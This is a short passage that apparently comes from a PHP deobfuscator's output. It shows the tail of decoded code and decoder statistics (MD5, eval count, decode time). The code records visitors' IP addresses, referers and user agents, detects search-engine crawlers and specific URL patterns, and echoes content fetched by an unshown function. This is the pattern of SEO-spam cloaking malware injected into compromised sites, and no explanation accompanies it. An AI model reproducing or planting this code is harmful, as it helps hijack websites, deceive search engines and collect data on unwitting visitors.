$data1['ip']=$_SERVER["REMOTE_ADDR"];$data1['referer']=isset($_SERVER['HTTP_REFERER'])?$_SERVER['HTTP_REFERER']:'';$data1['user_agent']=strtolower(isset($_SERVER['HTTP_USER_AGENT'])?$_SERVER['HTTP_USER_AGENT']:''); echo getSeCont11($jump1,$data1);return; } if($res_crawl || preg_match("#((\?|\/)[a-z])\=\d+#",$req_uri)){$data1['http_user_agent']=$user_agent;$ser_cont=getSeCont11($indata1,$data1);$bb='bb';echo $ser_cont;ex();}?>
Function Calls
None |
Stats
MD5 | 6a7a6d7162b2dee31feda78d8f2a4673 |
Eval Count | 0 |
Decode Time | 473 ms |